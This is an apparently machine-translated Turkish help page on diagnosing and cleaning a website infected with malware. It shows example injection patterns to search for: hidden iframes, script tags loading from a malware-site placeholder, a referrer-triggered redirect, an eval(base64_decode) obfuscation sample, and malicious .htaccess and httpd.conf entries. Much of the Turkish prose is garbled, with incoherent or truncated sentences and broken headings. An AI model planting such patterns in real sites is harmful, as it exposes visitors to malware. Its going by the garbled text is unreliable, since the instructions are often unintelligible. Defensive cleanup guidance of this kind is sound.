Kötü amaçlı yazılımla saldırıya uğramış

Kötü amaçlı yazılımlar, belli bir kişiye zarar vermek için özel olarak tasarlanmış her türlü yazılım veya mobil bilgisayar, mobil cihaz, çalıştırdığı yazılım veya kullanıcıları. Kötü amaçlı yazılım hakkında daha fazla bilgi edinmek için Kötü amaçlı ve istenmeyen yazılımlar başlıklı makaleyi inceleyin.

Siteniz kötü amaçlı yazılım içeriyorsa kullanıcılara genellikle "Bu site bilgisayarınıza zarar verebilir" ifadesi; arama sonuçlarında veya kullanıcı web sitenizi ziyaret etmeyi denediğinde tarayıcı tarafından gösterilen ara sayfa site, aşağıdaki gibi bir kodla:

Örnek kötü amaçlı yazılım ara sayfası
Kötü amaçlı yazılım uyarısı içeren arama sonuçları.
ziyaret edin.

Şunlara ihtiyacınız olacaktır:

  • Sitenizin sunucularına kabuk veya terminal yöneticisi erişimi: web, veritabanı, dosyalar.
  • Kabuk veya terminal komutları bilgisi.
  • Veritabanında SQL sorguları çalıştırabilme olanağı.

Hazırlık

  • Search Console'a kaydolun ve saldırıya uğramış sitenizin sahipliğini burada açıklandığı şekilde doğrulayın. Search Console, etkilenen sayfaların bir örneğini sağlar. Böylece, web sitenizde mevcut çok daha kolay bir şekilde çözülebilir. Ayrıca, .
  • Google Güvenli Tarama teşhis sayfasını görüntüleyin . Sayfanızın veya sitenizin listeleme durumunu şuna benzer bir URL'de görebilirsiniz: https://transparencyreport.google.com/safe-browsing/search?url=***<<page_or_site>>*** Örneğin: https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    <<page_or_site>>, belirli bir sayfa URL'si (http://example.com/badpage) veya tüm siteniz (example.com) için geçerlidir.

  • Sitenizdeki sayfaları görüntülemek için tarayıcı kullanmaktan kaçının. Çünkü kötü amaçlı yazılımlar kötü amaçlı yazılım bulaşmış bir dosyayı açarak tarayıcıdaki güvenlik açıklarını kullanarak yayılır bilgisayarınıza zarar verebilir. Teşhis talimatları geçerli değilse Örneğin, sayfaya doğrudan tarayıcınızdan erişmek için cURL veya HTTP istekleri gerçekleştirmek için Wget (örneğin, bir sayfayı getirmek için).

    Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini ekleme esnekliğine sahiptir. İçinde belirli bir yönlendiren veya kullanıcı aracısı, bilgisayar korsanlarını taklit etmeye yardımcı olur, çünkü bilgisayar korsanları, kendilerine yalnızca belirli Daha fazla "gerçek kişiyi" hedeflemek için kullanıcı aracıları veya yönlendirenler ve tarafından yapılan tespit ve tespiti kapsar.

`curl -v --referer "http://www.google.com" <your-url>`

Hem kullanıcı aracısını hem de yönlendireni belirten bir örneği aşağıda bulabilirsiniz:

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

Aşağıdakileri içeren ve içermeyen bir sayfayı getirmenizi öneririz: Bazı kötü amaçlı yazılımlar yalnızca etkinleştirildiği için --referer "https://www.google.com" kullanıcılar Google Arama sonuçlarından geldiğinde.

  • Bu adımdaki bulguların kaydedileceği bir doküman oluşturun. Belge, sonunda hasar gören her bir dosyanın adını ve konumunu (en azından) içermelidir bu e-posta ve bilgilerin nasıl virüse bulaştığını anlatacak ve Sitenizi temizleme ve bakımını yapma

  • Kötü amaçlı yazılımların nasıl çalıştığını ve bunları nasıl uygulayacağınızı öğrenmek için güvenliğinizi sağlamaya çalışın.

Teşhis

Sitenizi etkileyen kötü amaçlı yazılımları belirleyin:

  1. Güvenlik Sorunları raporunu açın . Etkilenen sayfaların örneklerinin listesini görmek için kötü amaçlı yazılım uyarısının açıklamasını genişletin. Bu listede olası her duruma yer verilmemiştir. şunun için örnek sayfalar almayabilirsiniz: sitenizdeki her tür kötü amaçlı yazılımdan kurtulun.
  2. Örnek sayfalarınızı aşağıdaki kötü amaçlı yazılım türlerine karşı test edin.
ziyaret edin.

Sunucu yapılandırmasında kötü amaçlı yazılım (istenmeyen yönlendirmeler)

Bir bilgisayar korsanı sitenizin güvenliğini ihlal etmiş ve ziyaretçileri web sitenizden yönlendiriyor kendi kötü amaçlı yazılım saldırı sitesine yönlendirmektedir. Bu, kötü amaçlı yazılım yapılandırma dosyasıdır. Sunucu yapılandırma dosyaları genellikle siteye izin verir yöneticisinin bir web sitesindeki belirli sayfalar veya dizinler için web sitesi. Örneğin, Apache sunucularında httpd.conf ve .htaccess dosyası budur.

Teşhis

Güvenlik Sorunları raporunda gösterilen örnek URL’lerin bazılarını ziyaret edin. Yanıt "sunucu yapılandırması" ile virüslü bir sayfadan enfeksiyonlar arasında şu başlıkları ekleyin:

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

Etkilenen dosyaları belirleyin

Kabuk veya terminal erişimi üzerinden sunucunuzda oturum açın (site çevrimdışı olabilir) gerekir) ve ilgili sunucu yapılandırma dosyalarını gözden geçirin. Daha fazla olabilir sunucu yapılandırma dosyalarından birini devreye sokmanız gerekir. Bu dosyaları kontrol edin bilinmeyen sitelere yönlendirmeler gibi istenmeyen yönergelerdir. Örneğin, .htaccess" dosyasını kullanıyorsanız şuna benzer bir yönlendirme görebilirsiniz:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

SQL yerleştirme

Bir bilgisayar korsanı, sitenizin veritabanının güvenliğini ihlal etti. Örneğin, bilgisayar korsanı bir veritabanının her kaydına programlı bir şekilde kötü amaçlı kod eklemek Böylece sunucu, Böylece, kötü amaçlı kod artık sayfanın içeriğine yerleştirilir ve kötü amaçlı site ziyaretçilerine zarar verir.

Teşhis

  1. Komut satırından, etkilenen URL'lerde bazı sorgular çalıştırın ve "iframe" gibi SQL saldırı kelimeleri için yanıt veya "eval" olabilir.
  2. Veritabanı sunucunuzda oturum açın ya da phpMyAdmin. Eğer Wget veya cURL kullandıysanız sayfanın kaynağında bulunan hasarı kodu Wget veya cURL aracılığıyla gerçek veritabanı girişleriyle değiştirmeniz gerekir. Örneğin, Sayfalarınızda tehlikeli bir iframe olduğunu fark ettiyseniz, bir SQL iframe kodu arayan sorgu. Örneğin:

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';
    
  3. Sunucunuzdaki veritabanı günlüğü ve hata dosyalarını kontrol ederek için olağan dışı görünen beklenmedik SQL komutları gibi olup olmadığını kontrol edin.

Sorunu düzeltme

Ya etkilenen her veritabanı kaydını güncelleyin ya da bilinen son veritabanınızı geri yükleyin yedekleme.

Kod yerleştirme

Sitenizdeki sayfalar, kötü amaçlı kodlar (ör. bir iframe) içerecek şekilde değiştirilmiş. kötü amaçlı yazılım saldırısı sitesi.

Teşhis

Güvenlik Sorunları raporunda gösterilen örnek URL'lerden bazılarını cURL veya Şüpheli kodu alın ve inceleyin. Yerleştirilen kod birçok türde olabilir ve zor olabilir. "iframe" gibi kelimeleri aramak faydalı olabilir bulmak için iframe kodu. Diğer yardımcı anahtar kelimeler "script", "eval" ve "unescape"tir. Örneğin, Örneğin, tüm dosyalarda "iframe" kelimesini nasıl çalıştırdığını öğrenin:

$grep -irn "iframe" ./ | less</pre>

Aşağıda, bakmanız gereken bazı yaygın kötü amaçlı yazılım kalıpları verilmiştir.

Kötü amaçlı site yükleyen bir iframe:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

Bir API'den komut dosyası çağıran veya çalıştıran saldırı sitesi:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

Tarayıcıyı bir saldırı sitesine yönlendiren komut dosyaları:

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

Algılanmamak için şaşırtma yapan zararlı kodlar:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

Aksi halde yararlı olacak şekilde rastgele kod yazmak üzere tasarlanmış paylaşılan nesne dosyaları komut dosyaları:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

Kötü amaçlı hata şablonları

404 Dosya Bulunamadı gibi hata mesajları için kullanılan şablon yapılandırıldı kötü amaçlı yazılım dağıtmak. Bu şekilde, saldırganlar saldırıya uğramış URL'lere bile olmadığını görürsünüz.

Teşhis

Sitenizde var olmayan veya başka tür bir sayfa gönderen hatasını onaylayın ve yanıtı inceleyerek yanıtın başka bir siteden mi yoksa Aksi takdirde kötü amaçlı yazılım içerir.

Sorunu düzeltme

Web sunucunuzda oturum açın ve sunucu yapılandırma dosyalarınızda hata olup olmadığını arayın sayfa direktifleridir. Örneğin, Apache web sunucularının hata şablonu şöyle olabilir: .htaccess dosyasında tanımlanmıştır. Şuradaki örnek .htaccess dosyası girişi: kötü amaçlı bir siteden 404 hata sayfaları getirir:

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

Sitenizi temizlemeye hazır olduğunuzda .htaccess dosyayı değiştirin bilinen iyi bir yedekle veya .htaccess dosya mevcut. Aşağıdaki durumlarda gerçek hata dosyalarını da temizlediğinizden emin olun: daha iyi olacaktır. Son olarak, web sunucunuzu yeniden başlatın ve geçerli olur.

Güvenliği ihlal edilmiş veya kötü amaçlı bir siteden yüklenen kaynaklar {com bulunabilird-resources}

Siteniz, barındırdığı bilinen bir web sitesine ait içerik veya kaynaklar kullanıyor kötü amaçlı içerik. Bunlar JavaScript dosyaları, resimler veya başka dosyalar olabilir. Bu nedenle, siteniz diğer girin.

Teşhis

Güvenlik Sorunları raporunda gösterilen örnek URL’lerin bazılarını ziyaret edin.

Sorunu düzeltme

  1. Search Console'daki Güvenlik Sorunları raporu. Bir tarayıcı uyarısı görürsünüz.
  2. Tarayıcı uyarısı şüpheli içeriğin alan adını belirtir. Tarayıcı uyarısında listelenen işaretli siteye yönelik tüm referansları kaldırın. İşaretlenen bir sitedeki içerik bilginiz dışında eklenmişse ciddi bir sorundur. Sitenizin güvenliği ihlal edilmiş olabilir ve sitenizi diğer saldırılar ve güvenlik açıkları açısından incelemeye devam etmelidir.
  3. Yasal bir siteden kasten içerik eklediyseniz ve işaretlenmiş site, etkinleştirildikten sonra içeriği yeniden kontrol etmek için, işaretlenmiş sitenin durumunu Google Güvenli Tarama teşhis sayfası bu site (http://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external} için gösterilir. Meşru sitelerin sahipleri bunları genellikle hızlı bir şekilde temizler.

Ek inceleme

Daha sonra, sisteminizde başka kötü amaçlı dosyalar veya değişiklikler olup olmadığını kontrol edin. İlgili içeriği oluşturmak için kullanılan bilgisayar korsanı mevcut sayfaları veya veritabanı kayıtlarını değiştirmiş, ancak kullanıcılar spam içerikli sayfalar, temiz sayfalarda spam görüntüleyen yazılı işlevler veya "arka kapılar" sitenize tekrar girmesini sağlayan veya sitenize yeniden kötü amaçlı bir kod içerir.

Siteniz çevrimiçi ise, bu inceleme için çevrimdışına alabilirsiniz.

Sitenizin bilinen iyi bir yedeğine sahipseniz hangi dosyaların yedekten oluşturulduğu veya değiştirildiği için bunları inceleyin ve inceleyin. Unix tabanlı sistemleri kullanıyorsanız yeni dosyaları bulmak için aşağıdaki gibi bir komut kullanabilirsiniz:

diff -qr <current-directory> <backup-directory>

Örneğin:

diff -qr www/ backups/full-backup-20120124/

ayrıca:

md5sum <current-page> <backup-page>

Örneğin:

md5sum www/page.html backups/full-backup-20120124/page.html

Sunucu, erişim ve hata günlüklerinde şüpheli bir etkinlik olup olmadığını kontrol edin. Örneğin, komut geçmişi (özellikle kök olarak) ve dosyanın oluşturulması bilinmeyen kullanıcı hesapları. Bilgisayar korsanının bu günlükleri değiştirmiş olabileceğine dikkat edin karar verebilir. Videoda, size nasıl yardımcı olabileceği konusunda Güvenlik açığını tespit edin.

Yapılandırma dosyalarında yönlendirme olup olmadığını kontrol edin. Yapılandırma dosyalarınız genellikle .htaccess ve httpd.conf olarak adlandırılır. Bilgisayar korsanları genellikle yönlendirmelerine göre yönlendirme yapar. Gerekirse yapılandırma dosyalarını güncellemek için sunucunuzu yeniden başlatmanız geçerli olur.

Aşırı esnek klasör ve dosya izinlerini kontrol edin. Bilgisayar korsanları, kurcalamaya çünkü esnek izinler site sahibi tarafından algılanmazsa bilgisayar korsanı, siteye tekrar girebilmek için bir yol bulacaktır. Dosya sayısı şundan büyük: 644 (rw-r--r--) ve 755 (rwxr-xr-x) değerinden büyük klasörler güvenliğe neden olabilir sorunları. Esnek izinler varsa, bunların gerçekten gerekli olup olmadığını belirleyin. Şu tarihte: Unix tabanlı sistemler, şunu deneyin:

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

ve:

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

Veritabanınız varsa, phpMyAdmin.